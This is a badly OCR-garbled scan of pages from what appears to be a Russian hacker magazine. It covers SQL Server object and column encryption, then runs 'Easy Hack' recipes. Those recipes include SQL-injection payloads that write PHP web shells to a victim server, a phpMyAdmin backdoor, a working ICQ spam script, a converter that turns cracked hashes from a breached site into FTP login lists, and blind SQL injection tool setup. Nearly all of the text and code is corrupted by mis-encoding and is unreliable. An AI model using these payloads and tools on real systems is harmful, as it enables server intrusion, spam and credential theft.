Ітам ТОЕ (Тгапзрагапі 
раіабазе Епсгурбоп]. 



процедур или функций. Получается, что, получив к ним 
доступ и грамотно проанализировав их код, любой 
опытный хакер сможет преобразовать шифрованную 
белиберду в исходный текст. Конечно, добраться до 
кода процедур далеко не всегда реально, потому здесь 
всплывает вопрос об утечке программной начинки 
производства, а именно — логике ПО. Но именно по 
этой причине необходимо прибегать к шифрованию 
процедур и функций в базе. Одно из самых популярных 
и удачных средств для таких действий — это програм- 
ма 5С!І_ БЫеШ [ ѵѵѵѵѵѵ.здІ-зЫеІб.сопп ]. После несложной 
установки приложения не забудь указывать допол- 
нительный флаг /*5ЦІ5ЫеІсІ*/ с выражением «ѴѴІТН 
ЕІ\ІСНѴРТІ0І\І» всякий раз, когда будешь создавать 
защищенную процедуру. Вот пример функции, которая 
исполняет простейший запрос к базе: 



СКЕАТЕ РКОСЕШКЕ МуТезС 

ШТН /*зд1зЪіе1<3*/ ЕЫСКУРТІОЫ 

АЗ 

ЗЕЬЕСТ 2+2 

Исполняем процедуру и получаем: 

МуТезД 
> 4 

Проверим, в каком виде хранится процедура, с помощью 
специального средства для ковыряния в файлах базы. 
Подойдет 5(Х Эегѵег Эузсоттепіз Эесгуріюг [ ѵѵѵѵѵѵ. 
деосіІіе5.сот/бОтп4г/б50Е5РѴР.Ыт[ 1 ; который при 
отображении текста процедуры показывает одни лишь 
знаки вопроса. Все работает! 




вания 5СИ Эегѵег 
совместно 
с параметром 
АЫ5І_РАВВІЫ0 
ОЕЕ может привес- 
ти к потере данных 
из-за неявных 
преобразований! 



Пример из личного опыта 

Сотрудниками одной компании платежно-карточного сектора велась база данных для выдачи зарплат. Для простого 
понимания, — пусть это будет примерно следующая структура: 





ГО 


БазгИате 


РігзЙМате 


Етр 


Зит 


> ѵѵагпіпд 


354 


Зотоѵ 


01е§ 


ІТ-Мапа^ег 


М0х8900156543 


Использование 


643 


Апгіроѵа 


Аіехапбга 


Иігесгог 


4343Бах#сІ5СІ555 


функций шифро- 


411 


Тітигоѵ 


Ѵаіегіу 


ТесЬпісаТОер. 0x2322322222 



Выборку из базы я привел абсолютно произвольную, а теперь суть идеи. «Безопасниками» компании было принято 
вполне благородное решение — шифровать данные о зарплатах, которые очень часто бывают «серыми». Инсайдер 
получил доступ к базе и сильно обломался, заимев информацию в таком виде. Однако, он не отчаялся и проделал 
следующий фокус. Резонно предположив, что человек с должностью директора должен получать больше, чем простой 
менеджер, он поменял соответствующие поля со значениями зарплат одно на другое, тем самым — подложив бух- 
галтерскому отделу абсолютно левую информацию. В благополучный день такая вещь прокатила, и все безопасники 
были уволены. Для справки: этим сотрудником был не я, как впрочем, и не безопасником. 
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АЛГОРИТМ 


Операции 


№ѵшисекрщ 
во операцию 
і, 1 б Б дампы к) 


Мипп и секунд на 
8КБ данных 


Ійцибкл 
• 1 

| 


ОЕЗ 


ЕНУурІЮТ 


0. 0416 


0:261 


■З.Ѳ9 




ЮмуіЯІОН 


0033 


0.2544 


4 26 


ТИРЬЕ_[>Е5 ЕЛСГЛЮОО 


0.0439 


0.6644 


■8.24 


ТИРіЕ_Р6В ОтДОЙ 


00390 


0.356 


-69 


ДС2 


ЕГЙГѴИ^ОГІ 


0.0437 


0.3731 


2.64 


ЙС2 


Очауріюп 


ооззе 


0.2275 


■0.86 


ЯС4 


ЕГЙГурІМУІ 


0.0461 


0.0594 


-3.62 


ЙС4 


ОваурРап 


0.0453 


0.0599 


■1.36 


ЯС4_128 


ВУТурІЮП 


0.0413 


0.0588 


-0.45 


АС4.120 


СЖгурЦіОП 


0 0400 


00601 


■0.66 


ОЕ6Х 


ЕГЙГурПйЧ 


0.044 


0.3335 


-7.99 


ое$х 


0«тур1*рп 


0.0300 


0,3403 


■4.60 


ДЕ9_І26 


ЕлауЩЮп 


0.042 


0.1574 


-0.4 


ДЕ5„1 23 


Оеаурійоп 


0.0331 


0.156 


2.43 


ДЕ5.І92 




0.0424 


0,1745 


-156 


АЕ5_192 


о«гуртіоп 


0.0333 


0.1724 


■0.7 


ДЕ$_256 


ЕпсгурПРп 


0.0422 


0,1334 


-0.62 


ДЕ6_256 


[>«гурТіСи1 


0.0386 


0.1351 


■2 11 


9$Д_5і2 


ЕпауріЕогі 


00305 


0.25 


Я5А_512 


ОМурИОП 


0.8577 


■0.06 


Р$А_1024 


ЕпегурШрп 


01024 


■0 15 


К5А.1024 


ОМурІіСнІ 


2.9135 


1.51 


Й$А_204$ 


Егктутадп 


01995 


1-02 


Я5Л_2048 


[ЖГурІіОП 


14.3245 


О 


М02 




0 0170 


1.7524 


026 


МСН 




0.0076 


0.0217 


0.31 


М05 


Н«ь 


0 0079 


0.0245 


■0.97 


$НА 


н»ь 


00063 


0.0272 


-0.5 


5НА1 


НваГі 


0.0083 


0.0272 


■0.96 



Посчитанные временные результаты для 
применения крипто-алгоритмов в среде 5СІІ_- 
сервера 2005 



И КАК ОБЛЕГЧИТЬ СЕБЕ ЖИЗНЬ? 

В заключение — не менее интересный про- 
дукт ХР_СВѴРТ ( фсгурі.сот ). Это средство 
осуществляет весь тот геморрой, который мы 
только что проделали вручную. Все, что от 
тебя требуется, — скачать дистрибутив проги, 
установить ее на сервер (к сожалению, есть 
версия только для Винды), обозначить свою 
базу данных и начать химию с таблицами с 
помощью удобного 0111-интерфейса. 
Организуем знакомство на примере из 
практики. Предположим, у нас есть интер- 




Так делать не стоит! 

В 5(2Ь Зегѵег можно создавать четыре типа объектов (хранимые процедуры, представле- 
ния, пользовательские функции и триггеры) с параметром ѴѴІТН ЕЫСКУРТІСЖ Этот пара- 
метр позволяет зашифровать определение объекта таким образом, что тот можно будет 
использовать, но получить его определение стандартными способами станет невозмож- 
но. Это средство рекомендуется и Місгозоіт. К сожалению, на практике никакой защиты 
применение стандартных средств шифрования не обеспечивает! Алгоритм, используе- 
мый при шифровании определений объектов, выглядит так: 

1 ) Зегѵег берет СЕГО той базы данных, в которой создается объект, и значение столбца 
соіісі таблицы зузсоттепщ для создаваемого объекта (чаще всего, его значение — 1 или 2) 
и производит их конкатенацию; 

2) Из полученного значения генерируется ключ при помощи алгоритма 5 НА; 

3) Этот хеш используется в качестве входящего значения при применении еще одного 
алгоритма хеширования — К5А. С его помощью генерируется набор символов, равный по 
длине шифруемому определению объекта; 

4) С этим набором символов и с реальным определением объекта производится операция 
ХОК. В результате получаются данные, которые помещаются в столбец сгехг таблицы 
зузсоттепщ. 

У этой схемы есть два слабых места: 

• Нам ничего не мешает заиметь исходные значения (СЕГО и соіісі) для выполнения тех 
же самых операций и получить ключ на расшифровку. Это можно сделать, например, 
использовав утилиту сІ5(2Ь5КѴЕ). Правда, для получения СШЭ базы данных (и для запуска 
этой утилиты) нам нужны права системного администратора; 

• Если у нас есть права на создание объектов в базе данных, можно сгенерировать точно 
такой же ключ для объекта, определение которого нам уже известно (путем сравнения 
шифрованного определения с незашифрованным) . Ну и — использовать его для расшиф- 
ровки значения другого объекта. 

Как можно расшифровать зашифрованные объекты на Зегѵег? Есть два варианта: 

• Использовать утилиту бЗОЬЗКУБ. Она позволяет выбрать любой зашифрованный объ- 
ект на сервере и записать его определение в текстовый файл; 

• Использовать хранимую процедуру ЭЕСКУРТ2К. Код на создание данных хранимых 
процедур (в разных вариантах и с разными объяснениями), которые расшифровывают 
определение зашифрованных объектов, легко найти через Соо^іе. 



ХР_Сгурі избавляет от ручного геморроя по шифрованию нужных полей, позволяя настроить все 
через своюудобную оболочку 
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нет-магазин, где каким-то образом хра- 
нятся данные о кредитных картах клиентов 
(распространенная ситуация, хотя это 
категорически запрещено!). Наша зада- 
ча — зашифровать конкретные данные о 
клиентах, т.е. поля с паролем, номером 
кредитной карточки и т.п. Пока мы ничего 
не делали, при запросе 5ЕІ_ЕСТ * ЕНОМ 
іЫ_ССагсІ5, СУБД возвращает все в откры- 
том виде: 

Шегпате Раззчлгогсі СгесІСагсШит 
Т атез дой 1234567890123456 

Іисаз зех 2894787650102827 

аппа Іоѵе 3234563638716434 

Напишем внешнюю функцию ІЮЕ (расшиф- 
ровывается, как «ЕІзег-ЭейпесІ-Рипсйоп», 
подробности — в последнем выпуске «Обзора 
эксплоитов») для преобразования строки в 
5НА-хеш: 



СР-ЕАТЕ ЕШСТІОЫ исі_МакеЗНАІ ((« 
сіеагразз ѴАКСНАР ( 8000 ) ) 

КЕТШШЗ ѴАКСНАК ( 40 ) 
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А 



1Р 1 



^ рс_гопе 



7 



г 



5(31. 5егѵег бувСоттепІ* йесгуріог (С) 2001 сЮММАЛ 



ЗеІесІ іНе і(ет$ уои ѵѵапі Іо $аѵе: 







Нате / 


Омпег 


Рагеій ОЬіесі 


СгеаІеН 


ЕпсгурІеН 




зр_ѵирдгасІе_5иЬ$сгірІіоп_сІаіаЬазе$ 


сІЬо 


(ІМ/А) 


8/6/2000 01:36:30 


□ 


ар_ѵирдгас1е_5иЬ8сгірІюп_ІаЫе$ 


сІЬо 


(ІМ/А) 


8/6/2000 01:36:31 


□ 


$р_ѵирдгайе_зу$соІ_зІаІи$ 


сІЬо 


(ІЧ/А) 


8/6/2000 01:36:32 


□ 


зр_\Мю 


сІЬо 


(ІЧ/А) 


8/6/2000 01:30:59 


□ 


зр_ѵѵЬо2 


сІЬо 


(Ы/А) 


8/6/2000 01:30:59 


□ 


здІзЬіеІсІ_5Іагіир 


сІЬо 


(ІЧ/А) 


1/1/2004 15:19:00 


□ 


ІздІзЬіеІсНезІ 


сІЬо 


(Ы/А) 


1/4/2004 20:00:03 


КЕНН 


Іезі гза 006 


ІсІЬо ІГЫ/АЧ 12/2/2003 08:15:45 



АЬоиІ 



8аѵе 



Ехіі 



А 



Г ІІІІТГ 

С помощьютулзы ЗузСоттепІз йесгуріюг находим хранимую процедуру и убеждаемся, что она 
зашифрована 




I» 



.іаы 




Б^огесІ РгасеЬиге РгореіЧіе* - Меѵѵ БЕогегі Ргосегіиге 



ОепегаІ | 



Ыате: 



Ргоседиге> 



Р 



Оѵ/пег: 
СгеѳАе еіаіе: 



Іех*: 



СВЕАТЕ РВОСЕОІІНЕ вфЫекЦвЙ 
у/ІТН /"«фЬІвМѴ ЕМСЙѴРТІСШ 
А5 

■■ Му зирег зесгеі аІдогііЬт 
$е!ес1 1 +2+3+4+5 



Создаем простейшую хранимую процедуру 



У разработчика есть два варианта: использовать встроенное в М55СИ 
шифрование, что не оченьхорошо, или воспользоваться возможностями 
ЗСИБЫеШ 




ЬЕСЬАКЕ @геЬ аз ѴАКСНАК(40) 

ЕХЕС тазЬег. .хр_зЪ.а1 @с1еагразз,@ 
геЬ ОЬТРЬТ 
КЕТІЛШ @геЬ 
ЕШ 

Отдаем команду: ЬРОАТЕ іЫ_ССагсІ5 5ЕТ 
раззѵѵогб = ббо.иб_Маке5НА1 (Раззѵѵогб). 
После чего еще раз проверяем содержи- 
мое базы той же командой. Что видим? Все 
зашифровано, все пароли захеширова- 
лись! Теперь нужно не забыть о том, что мы 
используем шифрование при обращении 
к базе. В нашем случае, когда ты будешь 
делать авторизацию пользователей, проце- 
дура проверки пароля по хешу будет выгля- 
деть примерно так: 

СКЕАТЕ ЕШСТІСЖ иЬШЬескЬзег (@ 
изегпате ѴАКСНАК ( 16 ) , @с1еаг_разз 



ѴАКСНАК (16)) 

КЕТ1ЛШ8 ШТЕСЕК 
АЗ ВЕСШ 

ЬЕСЬАКЕ @гез ШТЕСЕК 

ЗЕЬЕСТ @гез = соипЬ(*) ЕКОМ 1Ы_ 

ССагЫз ѵтЬеге изегпате=@изегпате АЬЬ 

раз зѵ\югс(=с1Ъо . исЫИакеЗНАІ ( @с1еаг_ 

разз) 

ІЕ @гез > 1 ЗЕЬЕСТ @гез= О 
КЕТЬКЬ @гез 
ЕШ 

Проверяем исполнением команды: 

ЗЕЬЕСТ сІЬо . иЕ-СЬескЬз ег 

( ' аппа ' , 1 коІЬазка 1 ) 

>1 (неправильно) 

ЗЕЬЕСТ сІЬо . ис!_СЬ.ескІІзег 

( 1 аппа 1 , 1 Іоѵе * ) 

>0 (окейно ! ) 



К шифрованию номера кредитной карты 
надо подойти более серьезно. Впрочем, 
мы не будем вникать в различного рода 
стандарты по информационной безопас- 
ности в платежно-карточной сфере (вроде 
РСІ; хотя организации, работающие с кре- 
дитными картами, безусловно обязаны это 
делать]. В бесплатной версии ХР_СПѴРТ 
существует возможность генерации только 
256-битного ключа Р5А. 

Вот этим-то как раз и можно воспользо- 
ваться (пусть упомянутый стандарт и тре- 
бует, как минимум, 768-битного ключа]. Я 
бы мог сейчас привести код по генерации 
публичного и приватного ключа, но... посту- 
пим проще. Все действия можно выполнить 
из понятного графического интерфейса, и 
во многих случаях оставить все на совести 
программы, не написав ни строчки кода. 

И поверь, будет работать!:>!1 



► озб 
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Игры меняются, 
батеіаіні.ги остается! 
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Еагц 

Наск 

Еазѵ 


Еагц 

Наск 

Наск> 


Еагц 

Наск 

ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 






ЛЕОНИД «ВОЮ» ОТРОЙКОВ АНДРЕЙ «! 

/ НОЮ@МАІІ_.КІІ / / КОМАНС 


ЗКѴ02» КОМАРОВ Р5УСНО. 

>Ѵ@ІТОЕГЕЫСЕ.П1І / / ХОѴѴЬ.ХОѴѴЬ 'СМАІЬ.СОМ / 








ЗАДАЧА: 



дЗАЛ ИТЬ ШЕЛЛ СРЕДСТВАМИ МѴ50І. 

РЕШЕНИЕ: 



1. Ищем на ѴѴеЬ-сервере директории, доступные для записи. Заветный 



ката л о г м ожет при сутств о вать в это м с п и с ке : 



/ С ешр 1 аЬ е з_с отр і 1 есі / 

/Ьетр1аЬез_с/ 

/ЬетрІаЬез/ 



/Ьетрогагу/ 

/ітадез/ 

/сасЬе/ 

/Ьетр/ 

/Іііез/ 

2. Мы уже подобрали колонки (допустим, их будет 4], и выполняем запрос: 

ШІСЖ ЗЕЬЕСТ "<? зузЬет ( $_КЕ01ІЕЗТ [ ' стсі ' ] ) ; ?>" ,2,3,4 
ІМТО ОІІТЕІЬЕ " /ѵаг/ѵ\плм/ЬЬт1/Ьетр/с . рЬр" -- 

3. Пользуемся шеллом по адресу ЫірУ/ѵісбт.сотДет р/с. рбр . 



№2 

ЗАДА ЧА: ЗАЛ ИТЬ ШЕЛЛ СРЕДСТВАМИ РНРМУАОМІЫ 
РЕШЕНИЕ: 

1. Каким-либо образом получаем доступ к РЬрМуАбтіп. 

2. Для эстетики и удобства создаем новую базу: 

СКЕАТЕ БАТАВАЗЕ ' Ьасксіоог ' 

3. Ищем установочный путь базы 
ЗЕЬЕСТ ©ѲсІаЬасііг 

> С : \АррЗегѵ\МуЗОЬ\<іаЬа\ 



4. Выполняем запрос на созданиетаблицы: 

СКЕАТЕ ТАВЬЕ Ьасксіоог ( 

ЗЬаск ТЕХТ 
) ТУРЕ=МУІЗаМ; 

ШЗЕКТ ШТО Ьасксіоог (ЗЬаск) 

ѴАЬБЕЗ ( 

' <ргехЬосіу Ьдсо1ог=зі1ѵег<? @зузЬет($_ 

КЕОЬЕЗТ [ "ѵ" ] ) ; ?></Ьо<Зух/рге> ' ) 

5. Отдаем команду на дамп содержимого таблицы в файл 

ЗЕЬЕСТ * іпЬо ЬитрНіІе 1 С : \АррЗегѵ\ѵ\плплЛз . рЬр ' Нгот 
Ьасксіоог; 

6. Получаем шелл по адресу ѵіс1:іт.сопп/5.рЬр?ѵ=команда . 




ЗАДАЧА: 



] СОХРАНИТЬ ПРОГРАММУ, ПОКАЗЫВАЕМУЮ ПО ОРТ 

РЕШЕНИЕ: 



У всех, кто смотрит передачи на «Первом канале», наверняка, бывает 
желание сохранить что-нибудь из их репертуара. Ноне все знают, что 
ОРТ выкладывают видео на своем сайте в виде опІіпе-Кѵ. Чтобы его 
сохранить, можно прибегнуть кдвум способам: 

1. Воспользоваться сервисом ги.заѵеітот.пеЬ Это очень просто, поэтому 
не буду углубляться в подробности. 

2. Вручную. Для этого открываем НТМІ_-код страницы с видео и находим 
место вставки плеера. 



3. Копируем 1)РІ_ к видео и переходим на него. 

4. Смотрим на адресную строку и видим, что параметром к ней выступает 
ссылка на файл настроек, передаваемая через адресную строку. Прочи- 
таем этот файл и найдемтам нужный ІІРІ_ к біѵ-фа йлу. 

ехіЬ ( ) ; } 

$Пі1е = Нореп ( $Пі1е_иіп, ' г ' ) ; 
ѵйіііе ( ! ПеоР ( $Рі1е) ) { 

$ЬиРПег = Ьгіт ( РдеЬз ( $Рі1е) ) ; 

$ісд->зепсі_шеззаде ( $ЬиРРег , $теззаде) ; 
есЬо «Мез заде зепЬ Ьо $ЬиПРег \п»; 

РІизЬ ( ) ; 

зіеер ( $раизе) ; } 

$ісд->с!ізсоппесЬ ( ) ; 



► 038 
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№4 

ЗАДАЧА: ОТЛИЧИТЬ ВІ№ 8 ОТ ВІ№ 9, УЧИТЫВАЯ, ЧТО АДМИНИС- 
ТРАТОРУДАЛИЛ ПАРАМЕТР ВЕРСИИ В КОНФИГУРАЦИОННЫХ 
ФАЙЛАХ ДЕМОНА 
РЕШЕНИЕ: 

Принципиальное отличие — в ВіпсІ 9 (начиная с версии 9.1 .0] появи- 
лась специальная служебная СНАОЗ-запись «аиібогз». Для проверки 
этого параметра можно использовать штатные средства операционной 
системы. 

1. Ііпих/ЕгееЬзсі 

сіід пз . ехатріе . сот аиДЬогз . Ьіпсі сЬаоз ЦхЦ 

2 . Ѵ7ІПСЗ.ОѴ73 / 1 іпих/ і. гееЬзсі 

% пзіоокир -д=кхк -сіазз=СНА08 аикНюгз . Ьіпсі . пз . ехашріе . сот 
Зегѵег: пз . ехатріе . сот 



№5 



[ЗАДАЧА: 



РЕШЕНИЕ: 

Задача особенно актуальна, потому что таким макаром можно охотить- 
ся за новыми образцами сплоитов. В этом плане очень пригодится 
тулза под названием Маігіііа ( таіуіиа.зоигсеіюгде.пеі: ). Она содержит 
в себе десятки алгоритмов для дешифровки, среди которых ипезсаре- 



Аскігезз : 23.23.23.23 
аикЬогз . Ьіпсі кехк = «ВоЬ Наііеу» 
аикЬогз . Ьіпсі кехк = «Магк АпЬгемз» 
аикЬогз .Ьіпсі кехк = «Ьатез Вгізкег» 
аикЬогз . Ьіпсі кехк = «МісЬаеі Сгаіі» 
аикЬогз . Ьіпсі кехк = «Баѵісі Ьашгепсе» 
аикЬогз . Ьіпсі кехк = «МісЬаеі Заѵтуег» 
аикЬогз . Ьіпсі кехк = «Вгіап ТДеіііпдкоп» 
аикЬогз .Ьіпсі кехк = «АпЬгеаз Сизкаіззоп» 

3. Получен ответс«пасхальным яйцом»от разработчиков — следова- 
тельно, перед нами девятая ветка! Чтобы выявить и предотвратить такое 
обнаружение, администратор может предпринять следующую сигнатуру: 

аіегС ГОР $ЕХТЕШАЬ апу -> $ШТЕШАЬ 53 (тзд: "108480/ 
патеЬ-ргоЬе-аиСЬогз " ; 

сопСепС : " I 07 | аиСЬогз I 04 | Ьіпсі»; сіерСЬ: 32; оіізек: 12; 
посазе; ) 

В ней содержится синтаксис для мониторинга II йР-тран спорта по 53 порту, по 
содержанию, приведенному втексте запроса, сзаданной глубиной поиска. 



последовательность, ЬС52-кодировка 35 и так далее. Итак, порядок 
действий: 

1. Копируем все вредоносное шифрованное содержимое на вкладку 
«Ооѵѵпіоасі». 

2 . Жмем «5епсІ зсгірШ Оесобег», затем «Пип зсгі рі». 

3. В ответ получаем дешифрованный (или почти дешифрованный] 
сегментами сорец и л инк на подгрузку файла. 

4 . Если сделать это в один клик не получилось, играемся с «Мізс 
сіесосіегз». 

Ресурсы, отслеживающие таіѵѵаге-активность онлайн: 

таІѵѵагесІоппаіпІізЕсопп . геизІгаскег.аЬизе.сб . 



Дешифровка на лету! На выходе Маігіііа показала линкс вредоносным .ехе и деобфусцированный исходникэксплоита 
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№6 

ЗАДАЧА: НАПИСАТЬ ІСО-СПАМЕР НА РНР 
РЕШЕНИЕ: 

ІСО-спам становится все более актуальным. Это сложно не заметить, 
особенно, если тебе в асю ежедневно прилетаете десятоксообщений 
рекламного характера. Большинство качественных продуктов для по- 
добных рассылокстоит денег, поэтому возникает вопрос: а не написать 
ли простенькую спамилку собственноручно? Например, на всеми нами 
любимом РНР. Думаешь, нереально? Ошибаешься, и сейчас я тебе это 
докажу: 

1. В своих начинаниях мы будем использоватьспециальный класс 
ѴѴеЫсциіе. сіазз. рбр, который ты сможешь найти на нашем 0Ѵ0. 

2. Для успешного использования всех функций класса следует при и нк- 
лудитьоный в нашем скрипте — 

іпсіисіе ( ' МеМсдЬііе . сіазз . рАр ' ) ; 

3. В общем виде, в качестве примера рассмотрим скрипт от Разбкеіа: 

<?рАр 

@зеі_ііте_1ітіі ( 0 ) ; 

@іпі_зеі ( " с!ізр1ау_еггогз " , " 1 " ) ; 

ідпоге_изег_аЪогі (1) ; 

іпсіисіе ( 1 ШеЫсдЬііе . сіазз . рАр 1 ) ; 

$іпі = рагзе_іпі_іі1е ( " ісд. іпі " ) ; 

$иіп = $іпі [иіп] ; // ХЕШ для бота 

$разз = $іпі [разз] ; // Пароль для ИШ бота 

$іі1е_иіп = $іпі [ іі1е_иіп] ; // Файл, где список рассылки 

$теззаде = $іпі [шеззаде] ; // Сообщение 

$раизе = $іпі [раизе] ; // пауза между сообщениями 

беііпе ( ' III N 1 , $иіп) ; 

беііпе ( ' РАЗЗЖЖБ' , $разз) ; 

$ісд = пеѵѵ МеМсдЬііе ( ) ; 

іі ( ! $ісд->соппесі (6Ш, РАЗЗЖЖВ) } { 



ѴѴеЫсяІ_йе: РНР класс для отправки и приема сообщений ІССІ. 

ѴѴеЫсрІ-іІіе - вырос из моего проекта РНР2ІСО . Класс содержит тот минимум набор возможностей необходимый 
для отправки и приема сообщения ІССЗ прямо из РНР. 

По многочисленным просьбам, в версию З.ОЬ включена возможность приема сообщений. С этой же версией 
появился тестовый робот ІССЗ:3180142 написаный при помощи ѴѴеЫсрЬіе ѵЗ.ОЬ. (Если робот оффлайн стучать 
ему бесполезно). 

Предвидя вопросы, а у меня ничего не работает, а что мне делать, срочно помогите, открыт Форум для 

клинических случаев , А пока вы конечно можете писать мне письма, стучать в асю(если найдете), но 
пожалуйста не обижайтесь если я не отвечу. 

Я -спамер на РНР своими руками 

есію $ісд->еггог; 
ехіі ( ) ; 

} 

$іі1е = іореп ( $іі1е_иіп, 1 г ' ) ; 
вдЬіІе ( ! іеоі ( $іі1е) ) { 

$Ьиііег = ігіт ( ідеіз ( $іі1е) ) ; 

$ ісд- >зепб_тез заде ( $Ъиііег , $теззаде) ; 
есію «Меззаде зепі іо $Ьиііег \п»; 

НизП ( ) ; 

зіеер ( $раизе) ; 

} 

$ісд-><іізсоппесі ( ) ; 
ехіі ( ) ; 

?> 

4. В файле іец.іпі располагаются данные поуинам: 

иіп = 12 3456 ; ОІК, с которого рассылаем 
разз = 1234 ; Пароль для ИШ, с которого рассылаем 
іі1е_иіп = иіп.іхі ; Файл со списком ИШ для рассылки 
шеззаде = іезі , бо поі геріу іПіз шеззаде, Ьоі-іезі ; 
Собственно, сама мессага для отсылки 

раизе = 2 ; Пауза между каждым сообщением, чтобы нас не 
забанили (в секундах) 

5. А в файле иіп. 1x1: лежитсписокуинов, по которым будет проводиться 
рассылка. 

Как видишь, все достаточно просто. Тебе остается лишь изменить сорец 
на свое усмотрение либо на кодить новый :). 




ЗАДАЧА 



|ОТПАРСИТЬ ДАННЫЕ ИЗ РА55ѴѴ0К0РК0 ДЛЯ ИСПОЛЬЗО- 
ВАНИЯ В РТР-ЧЕКЕРЕ 
РЕШЕНИЕ: 



Для брута самых разнообразныххешей часто приходится использовать 
популярнуюутилу РаззѵѵогбРго. Прога довольно удобна и отменно работает 
на забугорных ломанныхдедиках :). Проблема лишь втом, что каждый раз 
парсить вручную результаты брута —утомительно. Представь, что ты нашел 
50Б-инъекцию на крупном портале, слил имена и хеши МуЭОБ-юзеров 
и отправил их на брутв РаззѵѵогсІРго. Брутер с задачей справился, пассы 
найдены, и было бы неплохо попробовать их на РТР. Воттут и появляется 
многолишней работы, а именно — преобразованиесбрученныхданных 
из РаззѵѵогсІРго вида «асіт іп :5Ьа6862009 1 9Ы 9Тпагут7» в стандартный 
формат фтп-чекеров вида «11р://абппіп:пагупп7(сІ1 27.0.0.1». Итак, поехали: 

1 . Первое, что нам нужно сделать, — слить уже готовый парсер «5таІ1 
рагзегіог раззѵѵогсІрго» от еѵіІ_расктап’а с нашего 0Ѵ0 :). 2. Теперь экс- 
портируем уже обрученные акки из РаззѵѵогсІРго в файл Іігзііхі:, например: 



абшіп: 5Ьа686200919Ы9і :пагуш7 
пеѵѵз : 5Ъа6862 00919Ы9і :ѵѵепз6 
гооі : 5Ъа6862 00919Ы9і : заѵѵЬбѵ 
зѵѵіп: 5Ьа686200919Ы9і : газиі4 



ѵѵеЬ:5Ьа6862 00919Ы9і:підаѵг 

2. Вспоминаем, установлен ли у нас РНР. Если нет — срочно идем на Гугл 
и качаем (еще пригодится:]]. 

3. Созданный ранее файл іігзі.іхі (с акками из брутера] кладем в одной 
директории с парсером. 

4. Запускаем скрипт: 

С : ХрйрХрйр С : Храгзег . рйр іігзі . іхі оиі . іхі 127.0.0.1, 

— гдебгзЕІхІ: — файл с данными из РаззѵѵогсІРго, оиПхІ — файл сотпар- 
сенными аккаунтами, а 127.0.0.1 — ІР Ар-сервера. 

5. На выходе рядом с парсером обнаруживаем файл оиЕМ с содержимым : 
Парсим данные из РаззѵѵогбРго 
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Ібр : / /абтіп : пагут7@127 .0.0.1 
Ібр : / /пемз : мепзб@127 .0.0.1 
Ібр : //гооб : замЬ(іѵ@127 .0.0.1 
Ібр : / /зміп : 2азиб4@127 .0.0.1 



Ібр : / /меЬ : п1даѵг@127 .0.0.1 

Все, теперьберем любой функциональный фтп-чекер и проверяем 
аккаунты к РТР. 




нами таблиц 

• біс/дгеу_1іе1б_паше . бхб — дефолтовый словарь с именами 
колонок 



ЗАДАЧА:АЛЫЕРНАТИВНЫМ СПОСОБОМ УЗНАТЬ ОС НА СЕТЕВОМ 

УРОВНЕ 

РЕШЕНИЕ: 

Какты уже знаешь, ВІіпсІ 50І_-Іпіес1:іоп5 представляют собой слепые 
5С11_-инъекции, работа с которыми максимально затруднена. Если конк- 
ретнее, то раскручивать подобные баги ручками — дело неблагодарное. 
Поэтому, идея автоматизации процесса возникла давно и была успешно 
реализована в нескольких проектах, одним из которых мы и воспользу- 
емся. Использовать будем скрипт оттоварища Огеу’я, ибоутила специ- 
ально заточена под работу со слепыми скул-инъектами и мускулом. Из 
полезных фич скрипта следует отметить: 

• Вывод стандартной информации: ѵегзіоп() , изег ( ) , 
бабаЬазе ( ) , при тузді >= 3 версии. 

• Подбор имен таблиц по встроенной базе имен либо по ука- 
занному словарю, при тузді >=4.1 версии. 

• Подбор названий колонок к указанной таблице по встро- 
енной базе имен колонок либо по указанному словарику, при 
тузді >=4.1 версии. 

• Вывод результата указанного запроса, при тузді >=4.1 
версии . 

• Вывод содержимого указанного файла, при наличии соот- 
ветствующих прав в тузді >= 3 версии. 

• Определение длины результата указанного запроса, осо- 
бенно полезно при выводе части содержимого какого-либо 
файла, работает в тузді >=4.1 версии. 

• Определение имен таблиц и имен БД, в которых они нахо- 
дятся с помощью іп1огтабіоп_зс]тета . СаЫез в тузді => 5 
версии . 

• Определение имен колонок к указанной таблице, нахо- 
дящейся в указанной БД, с помощью іп1огтабіоп_зсЬета . 
соіитпз в тузді => 5 версии. 

• Сопоставление имен таблиц и имен БД, в которых они на- 
ходятся с помощью іп1огтабіоп_зсЬ.ета . баЫез в тузді => 5 
версии . 

• Поиск данных в файлах; по дефолту из файлов выделяются 
такие данные , как : 

• переменные, которые могут содержать пароль; 

• переменные, которые могут содержать данные для подклю- 
чения к СУБД. 

• Вывод стандартной информации в РозбдгеЗОБ: ѵегзіоп() , 
сиггепб_изег ( ) , сиггепб_бабаЬазе ( ) . 

• Подбор имен таблиц в РозбдгеЗОБ. 

Теперь рассмотрим алгоритм действий поустановке, настройке и запус- 
ку утилы: 

1. Сливаем архив стулзой с нашего БУБ. 

2. Распаковываем архив, проверяем содержимое: 

• таіп.рПр — сам скрипт 

• сопІід.рПр — файл с настройками скрипта 

• 1іЬ_апб_баба/дгеу_баба . рйр — стандартный словарик с 
именами таблиц и колонок 

• 1іЬ_апб_баба/ Іипсбіоп . рЬр — библиотека функций для 
работы со слепыми зді -инъекциями 

• біс/дгеу_ЬаЫе_пате . бхб — стандартный словарик с име- 



3. Заливаем все вышеперечисленные файлы на наш (или не совсем 
наш] хост. 

4 . Выставляем чмод на запись для каталога, в котором находятся скрип- 
ты сопбд.рбр и таіп.рбр. 

5 . Отредактируем сопбд.рбр. Особое внимание надо уделить основным 
параметрам: 



$Тюзб = ' ' ; // Адрес сайта 
$рогб = ; // Порт 

$рабП = ' 1 ; // Путь до уязвимого скрипта (начиная с ' Г ) 
$ѵагз = // Переменные (или содержимое КУКОВ, если 

зді -инъекция в КУКАХ) : вначале неуязвимые переменные с 
их значениями, 

//а затем, в конце, уязвимая переменная, вместе с су- 
ществующим значением, МОЖЕШВ указать кавычку, если она 
нужна 

$збгепб = ' ' ; // Символ комментария ('--+', ' /* * ' , ' # ' ) , 
если нужен 

$тебПоб = ; // (цифра) : метод отправки данных 
// 0 — РОЗТ; инъекция в переменной типа РОЗТ 
// 1 — СЕТ; инъекция в переменной типа СЕТ 
// 2 - СЕТ/СООКІЕ; инъекция в СООКІЕ 

$Туре = ; // (0 или 1) : тип распознания правильности вы- 
полнения зді-запроса: 

// 0 — правильность запроса определяется по наличию 
текста, который должен появляться только при указанном 
значении уязвимой переменной 

// 1 — правильность запроса определяется по отсутствию 
текста (текста ошибки) , которая должна появляться при 
неправильном выполнении запроса 

